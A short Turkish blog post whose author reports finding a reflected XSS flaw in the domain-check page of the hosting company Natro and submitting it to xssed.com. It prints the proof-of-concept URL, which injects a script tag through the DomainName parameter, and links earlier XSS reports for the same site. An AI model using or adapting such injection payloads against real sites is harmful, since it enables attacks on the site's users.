Natro Web Hosting Firması sitesinin domain check kısmında xss açığı olduğunu farkettim xssed.com'a submit ettim onaylanmasını bekliyorum...İşte bulduğum açık:
http://whois.natro.com/index.php?DomainName="><script>alert(/XSSeD BY USLUBEY/)</script>
Sitede daha öncedende bulunmuş xss açıkları:
http://www.xssed.com/mirror/30330/
http://www.xssed.com/mirror/826/
0 yorum :
Yorum Gönder
Yorumun denetlendikten sonra görüntülenecek...Teşekkürler!